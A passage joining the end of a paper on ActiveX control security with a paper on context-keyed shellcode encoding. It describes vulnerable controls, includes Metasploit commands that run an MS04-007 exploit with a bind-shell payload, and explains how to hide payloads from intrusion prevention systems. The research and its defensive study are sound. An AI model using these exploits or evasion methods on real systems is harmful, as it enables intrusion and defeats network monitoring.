use of a control's program ID (progID). Quite similar to IP addresses and the
domain name system(DNS), progIDs can be looked up to determine the matching
CLSID. Once the right one has been determined, Internet Explorer goes on as
if the CLSID had been provided in the first place.
For this technique to work for a given control, two requirements must be met.
First, a control must have a ProgID subkey under its CLSID key in the
registry. ProgIDs are usually in the form Program.Component.Version, such as
SafeWia.Script.1. Second, as there is no point for Windows to walk through up
to 2700 CLSIDs (in my example) to find the specified ProgID, the program ID
itself must have a key in HKEY_CLASSES_ROOT with a subkey named CLSID which
makes the association.
3.2) The Kill Bit
In some cases it is desirable to restrict a control from ever being
instantiated in IE. This can be accomplished through the use of a
kill bit. The kill bit can be defined by setting the 0x00000400 bit
in the DWORD associated with a given CLSID:
HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\<CLSID>
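Interpreting the flags value is then a single bit test, as in this sketch; reading the DWORD from the registry key quoted above is omitted, and the helper name is made up.

```c
#include <stdint.h>

/* Sketch of the kill-bit test. The flags value would normally be read from
 * the "Compatibility Flags" DWORD under the key quoted above; here it is
 * passed in directly. The 0x00000400 constant is the bit described in the
 * text. */
#define ACTIVEX_KILL_BIT 0x00000400u

int control_is_killed(uint32_t compat_flags)
{
    return (compat_flags & ACTIVEX_KILL_BIT) != 0;
}
```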
3.3) User Specific Controls
With Windows XP, Microsoft introduced support for user-specific ActiveX
controls. These do not require Administrator-level access to install because
the controls are specific to a certain user, as the name already implies.
These controls can be found under HKEY_CURRENT_USER\Software\Classes. While
this functionality exists, most ActiveX controls are installed globally.
3.4) Determining Exported Functions
ActiveX controls implement various COM interfaces in the same manner as any
other COM object. COM interfaces are well-defined definitions of what
functions and properties a COM class must implement and support. COM provides
the ability to dynamically query a COM class at runtime using QueryInterface
to see what interfaces it implements. This is how IE determines if a control
supports the safe for scripting interface (which is called IObjectSafety).
4) Examples
4.1) MW6 Technologies QRCode ActiveX 3.0
In this section the previously provided information will be demonstrated with
the help of a recent public ActiveX vulnerability and exploit. The vulnerable
control is from a company called MW6 Technologies and comes with their
``QRCode ActiveX'' version 3.0. When I downloaded the software in January
2008, several months after the exploit was posted on Milw0rm in September
2007, the vulnerable control was still part of the package.
The control itself has a CLSID of 3BB56637-651D-4D1D-AFA4-C0506F57EAF8. After the
installation of the software, it can be found in the registry in:
HKEY_CLASSES_ROOT\CLSID\{3BB56637-651D-4D1D-AFA4-C0506F57EAF8}
The DLL that implements this control can be found on the harddrive in the file
that is specified in the "InprocServer32" key. In this example it is:
C:\WINDOWS\system32\MW6QRC~1.DLL
There are two interesting things to note here. For one, the ProgID key has a
default value of MW6QRCode.QRCode.1. At the ProgID's corresponding location in
the registry, namely HKCR\MW6QRCode.QRCode.1, the CLSID subkey contains the
CLSID of that control. This tells us that this control can be instantiated
using both its CLSID and ProgID. Another point of interest in the registry
is the absence of the "Implemented Categories" key. This means that this
control is neither part of the "safe for scripting" nor the "safe for
initialization" category. However, it appears that the control must implement
IObjectSafety since it is still possible to instantiate the control from IE.
The following simple HTML code tries to instantiate the control.
<body>
<object classid='clsid:3BB56637-651D-4D1D-AFA4-C0506F57EAF8' id='test'>
</object>
</body>
The result of this snippet of code is that a small image appears in IE.
As this works without Internet Explorer complaining about being
unable to load the control, the next examination step is in order.
4.1.1) Enumerating Exported Interfaces
By now it has been shown that the example control can be instantiated from IE
just fine. The question now is what kind of interfaces the control provides to
the caller. By submitting the CLSID of the control to be examined to
ComRaider, the tool lists all of the control's implemented functions as
well as the kind and number of expected parameters. An alternative to
ComRaider is the OLE/COM Object Viewer that comes with the Platform SDK
and Visual Studio.
4.1.2) Exploitation
After playing around with various functions, it soon becomes obvious that
SaveAsBMP and SaveAsWMF happily accept any path provided to save the
generated graphic in the specified location. This can make it possible to
overwrite existing files with the picture if the user running IE has
sufficient access. This is a perfect example of a program using untrusted
data and operating on it without any kind of checks. It is likely that the
control's author did not consider the security implications of what they were
doing.
A sample exploit for this vulnerability, written by shinnai, can be found on
Milw0rm: http://www.milw0rm.com/exploits/4420.
4.2) HP Info Center
On December 12th, 2007, a vulnerability in an ActiveX control which was
shipped by default with multiple series of Hewlett Packard notebooks was
disclosed. The issue itself was found in a piece of software called the HP
Info Center. The vulnerability allowed remote read and write access to the
registry as well as the execution of arbitrary commands. By instantiating
this control in Internet Explorer and calling the vulnerable functions it was
possible to run software with the same level of access as the user running IE.
Porkythepig found and disclosed this serious threat and wrote a detailed
report as well as a sample exploit covering three attack vectors.
The HP control with the CLSID 62DDEB79-15B2-41E3-8834-D3B80493887A was
responsible for the listed vulnerabilities. By default it installs itself into
C:\Program Files\Hewlett-Packard\HP Info Center. In his advisory, porky
listed three potentially insecure methods as well as the expected parameters:
- VARIANT GetRegValue(String sHKey, String sectionName, String keyName);
- void SetRegValue(String sHKey, String sSectionName, String sKeyName, String sValue);
- void LaunchApp(String appPath, String params, int cmdShow);
While the first and second method allow for remote read and write access to
the registry, the third function runs arbitrary programs. For example, an
attacker could execute cmd.exe with arbitrary arguments.
In this example the vulnerable control provided remote access to the victims
machine. Sample code to exploit all three functions can once again be found on
Milw0rm: http://www.milw0rm.com/exploits/4720.
4.3) Vantage Linguistics AnswerWorks
The third and last example of various ActiveX vulnerabilities is in the
Vantage Linguistics AnswerWorks. Advisories covering this vulnerability were
released in December, 2007. The awApi4.AnswerWorks.1 control exports several
functions which are prone to stack-based buffer overflows. The functions
GetHistory(), GetSeedQuery(), and SetSeedQuery() fail to properly handle long
strings provided by a malicious website. The resulting stack-based buffer
overflow allows for the execution of arbitrary code, as "e.b." demonstrates
with a proof of concept that binds a shell to port 4444 when the exploit
succeeds.
When the exploit is loaded from a webserver it instantiates the CLSID and links
the created object to a variable named obj. It then calls the GetHistory()
function with a carefully crafted string which consists of 214 A's to fill the
buffer followed by a return address which overwrites the one saved on the
stack. After those 4 bytes come 12 NOPs and then finally the shellcode. As
one can easily see, this exploit is based on the same techniques that can be
seen in many other stack-based exploits.
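The layout described above can be sketched as follows; the return address and
shellcode bytes are placeholders, not the values used in e.b.'s exploit:

```python
import struct

# Sketch of the overflow string layout: 214 filler bytes, a 4-byte saved
# return address overwrite, 12 NOPs, then shellcode. The return address
# and shellcode bytes below are placeholders, not the real exploit values.
filler    = b"A" * 214
ret       = struct.pack("<I", 0x41414141)  # placeholder return address
nops      = b"\x90" * 12                   # NOP sled
shellcode = b"\xcc" * 32                   # placeholder (int3 padding)

payload = filler + ret + nops + shellcode
print(len(payload))
```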
The exploit mentioned in this example can also be found on Milw0rm:
http://www.milw0rm.com/exploits/4825.
5) Summary
This paper has provided a brief introduction to ActiveX. The focus has been
on discussing some of the underlying technology and security related issues
that can manifest themselves. This was meant to equip the reader with enough
background knowledge to examine ActiveX controls from a security point of
view. The author hopes he has described the big picture in sufficient detail
for readers to base further research on the acquired knowledge.
5.1) Acknowledgements
wastedimage - For answering the first questions
deft - For providing lots of answers and examples
rjohnson - For filling in details deft forgot to mention
skape - For background knowledge on underlying functions
hdm - For knowing all the rest
References
[1] ActiveX Controls @ Wikipedia
http://en.wikipedia.org/wiki/ActiveX_control
[2] ActiveX Controls
http://msdn2.microsoft.com/en-us/library/aa751968.aspx
[3] The art of software security assessment
http://taossa.com
[4] ComRaider
http://labs.idefense.com/software/fuzzing.php#morecomraider
[5] Axman ActiveX Fuzzer
http://www.metasploit.com/users/hdm/tools/axman/
Context-keyed Payload Encoding
Preventing Payload Disclosure via Context
October, 2007
I)ruid, C²ISSP
druid@caughq.org
http://druid.caughq.org
Abstract
A common goal of payload encoders is to evade a third-party detection mechanism which
is actively observing attack traffic somewhere along the route from an attacker
to their target, filtering on commonly used payload instructions. The use of
a payload encoder may be easily detected and blocked, and may also open up
the opportunity for the payload to be decoded for further analysis. Even
so-called keyed encoders utilize easily observable, recoverable, or guessable
key values in their encoding algorithm, thus making decoding on-the-fly
trivial once the encoding algorithm is identified. It is feasible that an
active observer may make use of the inherent functionality of the decoder stub
to decode the payload of a suspected exploit in order to inspect the contents
of that payload and make a control decision about the network traffic. This
paper presents a new method of keying an encoder which is based entirely on
contextual information that is predictable or known about the target by the
attacker and constructible or recoverable by the decoder stub when executed at
the target. An active observer of the attack traffic however should be unable
to decode the payload due to lack of the contextual keying information.
1) Introduction
In the art of vulnerability exploitation there are often numerous hurdles that
one must overcome. Examples include barriers to traversing the attack vector
and challenges in developing an effective vulnerability exploitation
technique. A critical step in the latter inevitably requires the
use of an exploit payload, traditionally referred to as shellcode. A payload
is the functional exploit component that implements the exploit's purpose[1].
One barrier to successful exploitation may be that including certain byte
values in the payload will not allow the payload to reach its destination in
an executable form[2], or even at all. Another hurdle to overcome may be that an
in-line network security monitoring device such as an Intrusion Prevention
System (IPS) could be filtering network traffic for the particular payload
that the exploit intends to deliver[3, 288-289], or otherwise extracting the
payload for further automated analysis[4][5, 2]. Whatever the hurdle may be,
many challenges relating to the payload portion of the exploit can be overcome
by employing what is known as a payload encoder.
1.1) Payload Encoders
Payload encoders provide the utility of obfuscating the exploit's payload
while it is in transit. Once the payload has reached its target, the payload
is decoded prior to execution on the target system. This allows the
payload to bypass various controls and restrictions of the type mentioned
previously while still remaining in an executable form. In general, an
exploit's payload will be encoded prior to packaging in the exploit itself
and what is known as a decoder stub will be prepended to the
encoded payload which produces a new, slightly larger payload. This new
payload is then packaged within the exploit in favor of the original.
1.1.1) Encoder
The encoder can take many forms and provide its function in a number of
different ways. At its most basic definition, an encoder is simply a function
used when packaging a payload for use by an exploit which encodes the payload
into a different form than the original. There are many different encoders
available today, some of which provide encoding such as alphanumeric
mixed-case text[6], Unicode safe mix-cased text[7], UTF-8 and tolower()
safe[2], and XOR against a 4-byte key[8]. There is also an extremely
impressive polymorphic XOR additive feedback encoder available called Shikata
Ga Nai[9].
1.1.2) Decoder Stub
The decoder stub is a small chunk of instructions that is prepended to the
encoded payload. When this new payload is executed on the target system, the
decoder stub executes first and is responsible for decoding the original
payload data. Once the original payload data is decoded, the decoder stub
passes execution to the original payload. Decoder stubs generally perform a
reversal of the encoding function, or in the case of an XOR obfuscation
encoding, simply perform the XOR again against the same key value.
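The XOR case is worth spelling out, since its self-inverse property is what
lets the stub reuse the encoding operation unchanged. A minimal sketch (the
payload and key bytes are arbitrary examples):

```python
# XOR obfuscation is its own inverse: applying the same key stream a second
# time recovers the original bytes, which is exactly what the decoder stub
# relies on. Payload and key bytes here are arbitrary examples.
def xor_bytes(data, key):
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

payload = b"\x31\xc0\x50\x68\x2f\x2f\x73\x68"
key     = b"\xde\xad\xbe\xef"

encoded = xor_bytes(payload, key)   # what travels over the wire
decoded = xor_bytes(encoded, key)   # what the stub does at run-time
assert decoded == payload
```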
1.1.3) Example: Metasploit Alpha2 Alphanumeric Mixedcase Encoder (x86)
The Metasploit Alpha2 Alphanumeric Mixedcase Encoder[6] encodes payloads as
alphanumeric mixedcase text using SkyLined's Alpha2 encoding suite. This
allows a payload encoded with this encoder to traverse such attack vectors as
may require input to pass text validation functions such as the C89 standard
functions isalnum() and isprint(), as well as the POSIX function isascii().
1.1.4) Keyed Encoders
Many encoders utilize encoding techniques which require a key value. The
Call+4 Dword XOR encoder[8] and the Shikata Ga Nai polymorphic XOR additive
feedback encoder[9] are examples of keyed encoders.
Key Selection
Encoders which make use of key data during their encoding process have
traditionally used either random or static data chosen at the time of
encoding, or data that is tied to the encoding process itself[10], such as the
index value of the current position in the buffer being operated on, or a
value relative to that index.
Example: Metasploit Single-byte XOR Countdown Encoder (x86)
The Metasploit Single-byte XOR Countdown Encoder[10] uses the length of the
remaining payload to be operated upon as a position-dependent encoder key.
The benefit that this provides is a smaller decoder stub, as the decoder stub
does not need to contain any static keying information. Instead, it tracks
the length property of the payload as it decodes and uses that information as
the key.
Weaknesses
The most significant weakness of most keyed encoders available today is that
the keying information that is used is either observable directly or
constructable from the observed decoder stub. Either the static key
information is transmitted within the exploit as part of the decoder stub
itself, or the key information is reproducible once the encoding algorithm is
known. Knowledge of the encoding algorithm is usually obtainable by
recognizing known decoder stubs or analyzing unknown decoder stubs
instructions in detail.
The expected inherent functionality of the decoder stub also introduces a
weakness. Modern payload encoders rely upon the decoder stub's ability to
properly decode the payload at run-time. It is feasible that an active
observer may exploit this inherent functionality to decode a suspected payload
within a sandbox environment in real-time[5,3] in order to inspect the contents of
the payload and make a control decision about the network traffic it was found
in. Because the decoder stub requires only that it is being executed by a
processor that will understand its instruction-set, producing such a sandbox
is trivial.
Unfortunately, all of the aforementioned keyed encoders include the static key
value directly in their decoder stubs and are thus vulnerable to the
weaknesses described here. This allows an observer of the encoded payload in
transit to potentially decode the payload and inspect its content.
Fortunately, all of the keyed encoders previously mentioned could potentially
be improved to use contextual keying as is described in the following chapter.
2) Contextual Keying
Contextual keying is defined as the process of selecting an encoding key from
context information that is either known or predictable about the target. A
context-key is defined as the result of that process. The context information
available about the exploit's target may contain any number of various types
of information, dependent upon the attacker's proximity to the target,
knowledge of the target's operation or internals, or knowledge of the target's
environment.
2.1) Encoder
When utilizing a context-key, the method of encoding is largely unchanged from
current methods. The exploit crafter simply passes the encoding function the
context-key as its static key value. The size of the context-key is dependent
upon the requirements of the encoder being used; however, it is feasible that
the key may be of any fixed length, or ideally the same size as the payload
being encoded.
2.2) Decoder Stub
The decoder stub that requires a context-key is not only responsible for
decoding the encoded payload but is also responsible for retrieving or
otherwise generating its context-key from the information that is available to
it at run-time. This may include retrieving a value from a known memory
address, performing some calculation on other information available to it, or
any number of other possible scenarios. The following section will explore
some of the possibilities.
2.3) Application Specific Keys
2.3.1) Static Application Data
If the attacker has the convenience of reproducing the operating environment
and execution of the target application, or even simply has access to the
application's executable, a context-key may be chosen from information known
about the address space of the running process. Known locations of static
values such as environment variables, global variables and constants such as
version strings, help text, or error messages, or even the application's
instructions or linked library instructions themselves may be chosen from as
contextual keying information.
Profiling the Application
To successfully select a context-key from a running application's memory, the
application's memory must first be profiled. By polling the application's
address space over a period of time, ranges of memory that change can be
eliminated from the potential context-key data pool. The primary requirement
of viable data in the process's memory space is that it does not
change over time or between subsequent instantiations of the running
application. After profiling is complete, the resultant list of memory
addresses and static data will be referred to as the application's
memory map.
Memory Map Creation
The basic steps to create a comprehensive memory map of a running process are:
1. Attach to the running process.
2. Initialize the memory map with a poll of non-null bytes in the running
process's virtual memory.
3. Wait an arbitrary amount of time.
4. Poll the process's virtual memory again.
5. Find the differential between the contents of the memory map and the most
recent memory poll.
6. Eliminate any data that has changed between the two from the memory map.
7. Optionally eliminate any memory ranges shorter than your desired key length.
8. Go to step 3.
Continue the above process until changing data is no longer being eliminated
and store the resulting memory map as a map of that instance of the target
process. Restart the application and repeat the above process, producing a
second memory map for the second instance of the target process. Compare the
two memory maps for differences and again eliminate any data that differs.
Repeat this process until changing data is no longer being eliminated.
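The intersection step at the heart of this loop can be sketched in a few
lines of Python, with dictionaries standing in for raw memory polls (the
addresses and byte values below are invented):

```python
# Sketch of memory-map refinement: intersect successive polls of a process's
# memory, keeping only addresses whose byte values never change. Addresses
# and values are invented for illustration.
def refine(memory_map, poll):
    """Both arguments map address -> byte value; keep only stable entries."""
    return {addr: val for addr, val in memory_map.items()
            if poll.get(addr) == val}

poll1 = {0x1000: 0x55, 0x1001: 0x8B, 0x1002: 0x12}
poll2 = {0x1000: 0x55, 0x1001: 0x8B, 0x1002: 0x99}  # 0x1002 changed

memory_map = refine(poll1, poll2)
print(sorted(hex(a) for a in memory_map))
```

Repeating the call against further polls (and against maps from separate
instantiations of the process) converges on the stable data described above.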
The resulting final memory map for the process must then be analyzed for
static data that may be directly relative to the environment of the process
and may not be consistent across processes running within different
environments such as on different hosts or in different networks. This type
of data includes network addresses and ports, host names, operating system
"unames", and so forth. This type of data may also include installation
paths, user names, and other user-configurable options during installation of
the application. This type of data does not include application version
strings or other pertinent information which may be directly relative to the
properties of the application which contribute to the application being
vulnerable and successfully exploited.
Identifying this type of information relative to the application's environment
will produce two distinct types of memory map data; one type containing static
application context data, and the other type containing environment context
data. Both of these types of data can be useful as potential context-key
values, however, the former will be more portable amongst targets whereas the
latter will only be useful when selecting key values for the actual target
process that was actively profiled. If environment context data is
undesirable, profiling additional instances of the process on different
network hosts and with different installation configuration options during
the memory map generation process outlined above will likely eliminate it
from the memory map entirely.
Finally, the memory maps can be trimmed of any remaining NULL bytes to reduce
their size. The final memory map should consist of records containing memory
addresses and the string of static data which can be found in memory at those
locations.
Memory Map Creation Methods
Metasploit Framework's msfpescan
One method to create a memory map of viable addresses and values is to use a
tool provided by the Metasploit Framework called msfpescan. msfpescan is
designed to scan PE formatted executable files and return the requested
portion of the .text section of the executable. Data found in the .text
section is useful as potential context-key data as the .text section is marked
read-only when mapped into a process' address space and is therefore static
and will not change. Furthermore, msfpescan predicts where in the executed
process' address space these static values will be located, thus providing
both the static data values as well as the addresses at which those values can
be retrieved.
To illustrate, suppose a memory map for the Windows System service needs to be
created for exploitation of the vulnerability described in Microsoft Security
Bulletin MS06-040[11] by an exploit which will employ a context-keyed payload
encoder. A common DLL that is linked into the service's executable when
compiled can be selected as the target for msfpescan. In this case,
ws2help.dll is chosen due to its lack of updates since August 23rd, 2001.
Because this particular DLL has remained unchanged for over six years, its
instructions provide a particularly consistent cache of potential context-keys
for an exploit targeting an application linked against it anytime during the
last six years. A scan of the first 1024 bytes of ws2help.dll's executable
instructions can be performed by executing the following command:
msfpescan -b 0x0 -A 1024 ws2help.dll
Furthermore, msfpescan has been improved via this research effort to render
data directly as a memory map. This improved version is available in the
Metasploit Framework as of version 3.1. A scan and dump to memory map of
ws2help.dll's executable instructions can be performed by executing the
following command:
msfpescan --context-map context ws2help.dll
It is important to note that this method of memory map generation is much less
comprehensive than the method previously outlined; however, when targeting a
process whose executable is relatively large and links in a large number of
libraries, profiling only the instruction portions of the executable and
library files involved may provide an adequately-sized memory map for
context-key selection.
Metasploit Framework's memdump.exe
The Metasploit Framework also provides another useful tool for the profiling
of a running process' memory called memdump.exe. memdump.exe is used to dump
the entire memory space of a running process. This tool can be used to
provide the polling step of the memory map creation process previously
outlined. By producing multiple memory dumps over a period of time, the dumps
can be compared to isolate static data.
smem-map
A tool for profiling a Linux process' address space and creating a memory map
is provided by this research effort. The smem-map tool[12] was created as a
reference implementation of the process outlined at the beginning of this
section. smem-map is a Linux command-line application and relies on the proc
filesystem as an interface to the target process' address space.
The first time smem-map is used against a target process, it will populate an
initial memory map with all non-null bytes currently found in the process's
virtual memory. Subsequent polls of the memory ranges that were initially
identified will eliminate data that has changed between the memory map and the
most recent poll of the process's memory. If the tool is stopped and
restarted and the specified memory map file exists, the file will be reloaded
as the memory map to be compared against instead of populating an entirely new
memory map. Using this functionality, a memory map can be refined over
multiple sessions of the tool as well as multiple instantiations of the target
process. A scan of a running process' address space can be performed by
executing the following command:
smem-map <PID> output.map
Context-Key Selection
Once a memory map has been created for the target application, the encoder may
select any sequential data from any memory address within the memory map which
is both large enough to fill the desired key length and also does not produce
any disallowed byte values in the encoded payload as defined by restrictions
to the attack vector for the vulnerability. The decoder stub should then
retrieve the context-key from the same memory address when executed at the
target. If the decoder stub is developed so that it may read individual bytes
of data from different locations, the encoder may select individual bytes from
multiple addresses in the memory map. The encoder must note the memory
address or addresses at which the context-key is read from the memory map for
inclusion in the decoder stub.
Proof of Concept: Improved Shikata ga Nai
The Shikata ga Nai encoder[9], included with the Metasploit Framework, implements
polymorphic XOR additive feedback encoding against a four byte key. The
decoder stub that is prepended to a payload which has been encoded by Shikata
ga Nai is generated based on dynamic instruction substitution and dynamic
block ordering. The registers used by the decoder stub instructions are also
selected dynamically when the decoder stub is constructed.
Improving the original Metasploit implementation of Shikata ga Nai to use
contextual keying was fairly trivial. Instead of randomly selecting a four
byte key prior to encoding, a key is instead chosen from a supplied memory
map. Furthermore, when generating the decoder stub, the original
implementation used a "mov reg, val" instruction (0xb8) to move the key value
directly from its location in the decoder stub into the register it will use
for the XOR operation. The context-key version instead uses a "mov reg,
[addr]" instruction (0xa1) to retrieve the context-key from the memory
location at [addr] and store it in the same register. The update to the
Shikata ga Nai decoder stub was literally as simple as changing one
instruction, and providing that instruction with the context-key's location
address rather than a static key value directly.
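That one-instruction change can be sketched as raw x86 bytes: 0xb8 imm32 is
"mov eax, imm32" (static key carried in the stub), while 0xa1 moffs32 is
"mov eax, [addr]" (key fetched from memory at run-time). The key and address
values below are examples only:

```python
import struct

# The two decoder-stub variants differ only in opcode and operand meaning.
def mov_eax_imm(key):
    """x86 'mov eax, imm32': static key embedded in the stub (0xb8)."""
    return b"\xb8" + struct.pack("<I", key)

def mov_eax_mem(addr):
    """x86 'mov eax, [addr]': key read from memory at run-time (0xa1)."""
    return b"\xa1" + struct.pack("<I", addr)

print(mov_eax_imm(0xdeadbeef).hex())  # static-key form
print(mov_eax_mem(0x7ffe0000).hex())  # context-key form
```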
The improved version of Shikata ga Nai described here is provided by this
research effort and is available in the Metasploit Framework as of version
3.1. It can be utilized as follows from the Metasploit Framework Console
command-line, after the usual exploit and payload commands:
set ENCODER x86/shikata_ga_nai
set EnableContextEncoding 1
set ContextInformationFile <application.map>
exploit
Case Study: MS04-007 vs. Windows XP SP0
The Metasploit framework currently provides an exploit for the vulnerability
described in Microsoft Security Bulletin MS04-007[13]. The vulnerable application
in this case is the Microsoft ASN.1 Library.
Before any exploitation using contextual keying can take place, the vulnerable
application must be profiled. By opening the affected library from Windows XP
Service Pack 0 in a debugger, a list of libraries that it itself includes can
be gleaned. By collecting said library DLL files from the target vulnerable
system, or an equivalent system in the lab, msfpescan can then be used to
create a memory map:
msfpescan --context-map context \
ms04-007-dlls/*
cat context/* >> ms04-007.map
After the memory map has been created, it can be provided to Metasploit and
Shikata ga Nai to encode the payload that Metasploit will use to exploit the
vulnerable system:
use exploit/windows/smb/ms04-007-killbill
set PAYLOAD windows/shell_bind_tcp
set ENCODER x86/shikata_ga_nai
set EnableContextEncoding 1
set ContextInformationFile ms04-007.map
exploit
2.3.2) Event Data
Similar to the static application data approach, transient data may also be
used as a context-key so long as it persists long enough for the decoder stub
to access it. Consider the scenario of a DNS server which is vulnerable to an
overflow when parsing an incoming host name or address look-up request. If
portions of the request are stored in memory prior to the vulnerability being
triggered, the data provided by the request could potentially be used for
contextual keying if its location is predictable. Values such as IP
addresses, port numbers, packet sequence numbers, and so forth are all
potentially viable for use as a context-key.
2.3.3) Supplied Data
Similar to Event Data, an attacker may also be able to supply key data for
later use to the memory space of the target application prior to exploitation.
Consider the scenario of a caching HTTP proxy that exhibits the behavior of
keeping recently requested resources in memory for a period of time prior to
flushing them to disk for longer-term storage. If the attacker is aware of
this behavior, the potential exists for the attacker to cause the proxy to
retrieve a malicious web resource which contains a wealth of usable
context-key data. Even if the attacker cannot predict where in memory the
data may be stored, by having control of the data that is being stored other
exploitation techniques such as egg hunting[14, 9][15] may be used by a
decoder-stub to locate and retrieve context-key information when its exact
location is unknown.
2.4) Temporal Keys
The concept of a temporal address was previously introduced by the paper
entitled Temporal Return Addresses: Exploitation Chronomancy[16, 3]. In
summary, a temporal address is a location in memory which holds timer data of
some form. Potential types of timer data stored at a temporal address include
such data as the system date and time, number of seconds since boot, or a
counter of some other form.
The research presented in the aforementioned paper focused on leveraging the
timer data found at such addresses as the return address used for
vulnerability exploitation. As such, the viability of the data found at the
temporal address was constrained by two properties of the data defined as
scale, and period. These two properties dictate the window of time during
which the data found at the temporal address will equate to the desired
instructions. Another potential constraint for use of a temporal address as
an exploit return address stems from the fact that the value contained at the
temporal address is called directly for use as an executable instruction. If
the memory range it is contained within is marked as non-executable such as
with the more recent versions of Windows[16, 19], attempting use in this manner
will cause an exception.
For the purpose that temporal addresses will be employed here, such strict
constraints as those previously mentioned do not exist. Rather, the only
desired property of the data stored at the temporal address which will be used
as a context-key is that it does not change, or as in the case of temporal
data, does not change during the time window in which we intend to use it.
Due to this difference in requirements, the actual content of the temporal
address is somewhat irrelevant and therefore is not constrained to a
time-window in either the future or the past during which the data found at
the temporal address will be fit for purpose. The viable time-window in the
case of use for contextual keying is entirely constrained by duration rather
than location along the time-line. Because the values at different byte
offsets within the data found at a temporal address have differing update
frequencies, selecting key data from these values produces time-windows of
varying duration during which the values will remain constant. By using
single-byte, dual-byte, or otherwise relatively short context-keys, and
carefully selecting from the available byte values stored within the timer
found at the temporal address, the viable time-window can be made quite
lengthy.
2.4.1) Context-Key Selection
Provided by the previously mentioned temporal return address research effort
is a very useful tool called telescope[16, 8]. The tool's function is to analyze a
running process' memory for potential temporal addresses and report them to
the user. By using this tool, potential context-key values and the addresses
at which they reside can be respectively predicted and identified.
The temporal return addresses paper also revealed a section of memory, called
SharedUserData[16, 17], that is mapped into all processes running on Windows
NT and more recent Windows systems. The interesting properties of the
SharedUserData region of a process's address space are that it is always
mapped into memory at a predictable location and is required to be backwards
compatible with previous versions. As such, the individual values contained
within the region will always be at the same offset from its predictable base
address. One of the values contained within this region of memory is the
system time, which will be used in the examples to follow.
Remotely Determining Time
Methods and techniques for profiling a target system's current time is outside
of the scope of this paper, however the aforementioned paper on temporal
return addresses[16, 13-15] offers some insight. Once a target system's
current time has been identified, the values found at various temporal
addresses in memory can be readily predicted to varying degrees of accuracy.
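Once a rough guess at the target's clock is available, the corresponding
SystemTime bytes can be computed directly. The following Python sketch (not
from the original paper; it assumes only the documented encoding of the timer
as 100-nanosecond intervals since January 1st, 1601) predicts the timer bytes
from a guessed Unix timestamp:

```python
# Sketch: predict the bytes of SharedUserData's SystemTime value from a
# guess at the target's clock. Windows stores SystemTime as a count of
# 100ns intervals since January 1st, 1601.
EPOCH_DELTA = 11644473600  # seconds between 1601-01-01 and 1970-01-01

def predicted_systemtime_bytes(unix_seconds):
    """Return the 8 timer bytes (little-endian) for a guessed time."""
    intervals = (unix_seconds + EPOCH_DELTA) * 10**7
    return intervals.to_bytes(8, "little")

# The four bytes labeled High1Time are byte offsets 4-7 of this value;
# the higher bytes change slowly enough to predict from a coarse guess.
high1 = predicted_systemtime_bytes(0)[4:]  # Unix epoch as an example
```

The higher the byte offset chosen from the predicted value, the coarser the
guess at the target's time needs to be.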
Time-Window Selection
It is important to note that when using data stored at a temporal address as a
context-key, parts of that value are likely to be changing frequently.
Fortunately, the key length being used may not require use of the entire timer
value, and as such the values found at the byte offsets that are frequently
changing can likely be ignored. Consider the SystemTime value from the
Windows SharedUserData region of memory. SystemTime is a 100 nanosecond timer
which is measured from January 1st, 1601, is stored as a KSYSTEM_TIME
structure, and is located at memory address 0x7ffe0014 on all versions of
Windows NT[16, 16]:
0:000> dt _KSYSTEM_TIME
+0x000 LowPart : Uint4B
+0x004 High1Time : Int4B
+0x008 High2Time : Int4B
Due to this timer's frequent update period, granularity, and scale, some of
the data contained at the temporal address will be too transient for use as a
context-key. The capacity of SystemTime is twelve bytes, however due to the
four bytes labeled as High2Time having an identical value as the four bytes
labeled as High1Time, only the first eight bytes are relevant as a timer. As
shown by the calculations provided by the temporal return addresses paper[16,
10], reproduced in the table below, it is only worth focusing on values
beginning at byte index four of the SystemTime value, or the four bytes
labeled as High1Time located at address 0x7ffe0018.
+------+----------------------------------+
| Byte | Seconds (ext) |
+------+----------------------------------+
| 0 | 0 (zero) |
| 1 | 0 (zero) |
| 2 | 0 (zero) |
| 3 | 1 (1 sec) |
| 4 | 429 (7 mins 9 secs) |
| 5 | 109951 (1 day 6 hours 32 mins) |
| 6 | 28147497 (325 days 18 hours) |
| 7 | 7205759403 (228 years 179 days) |
+------+----------------------------------+
It is also interesting to note that if the payload encoder only utilizes a
single byte context-key, it may not even be required that the attacker
determine the target system's time, as the value at byte index six or seven of
the SystemTime value could be used, requiring only that the attacker guess the
system time to within a little less than a year, or to within 228 years,
respectively.
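The time-windows in the table above follow directly from the timer's
100-nanosecond granularity; a small Python sketch reproducing the truncated
values might look like:

```python
# Sketch: how long each byte offset of the 100ns SystemTime counter
# stays constant, matching the table above (values are truncated).
def constant_window_seconds(byte_index):
    """Seconds before the byte at the given offset changes value."""
    # byte n increments once every 256**n ticks of 100ns each;
    # integer arithmetic avoids floating-point truncation surprises
    return (256 ** byte_index * 100) // 10**9

windows = [constant_window_seconds(i) for i in range(8)]
# e.g. byte 4 -> 429 seconds (7 mins 9 secs),
#      byte 7 -> 7205759403 seconds (roughly 228 years)
```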
3) Weaknesses
Due to the cryptographically weak properties of using functions such as XOR to
obfuscate data, there exist well known attacks against these methods and their
keying information. Although payload encoders which employ XOR as their
obfuscation algorithm have been discussed extensively throughout this paper,
it is not the author's intent to tie the contextual keying technique
presented here to such algorithms. Rather, contextual keying could just as
readily be used with cryptographically strong encoding algorithms as well. As
such, attacks against the encoding algorithm used, or specifically against the
XOR algorithm, are outside the scope of this paper and will not be detailed
herein.
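For illustration only, a context-keyed XOR round trip might be sketched as
follows. This is a toy stand-in, not the actual Shikata ga Nai implementation,
and the payload and key bytes are made up:

```python
# Toy illustration: a payload XOR-encoded with a context key that the
# decoder re-reads from target memory at run time.
def xor_with_key(data, key):
    """XOR every byte of data against a repeating multi-byte key."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

payload = b"\x90\x90\xcc"        # stand-in for real shellcode
context_key = b"\x9d\x01"        # e.g. bytes read from a temporal address

encoded = xor_with_key(payload, context_key)

# On the target, a decoder stub would fetch the same bytes from the
# temporal address and recover the payload in place:
assert xor_with_key(encoded, context_key) == payload
```

An off-line analyst without the correct key bytes recovers only garbage,
which is precisely the property contextual keying relies on.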
4) Conclusion
While the use of context-keyed payload encoders likely won't prevent a
dedicated forensic analyst from successfully performing an off-line analysis
of an exploit's encoded payload, the targeted system, and the target
application in an attempt to discover the key value used, contextual keying
will prevent an automated system from decoding the payload in real-time if it
does not have access to, or an automated method of constructing, an adequate
memory map of the target from which to retrieve the key.
As systems hardware technology and software capability continue to improve,
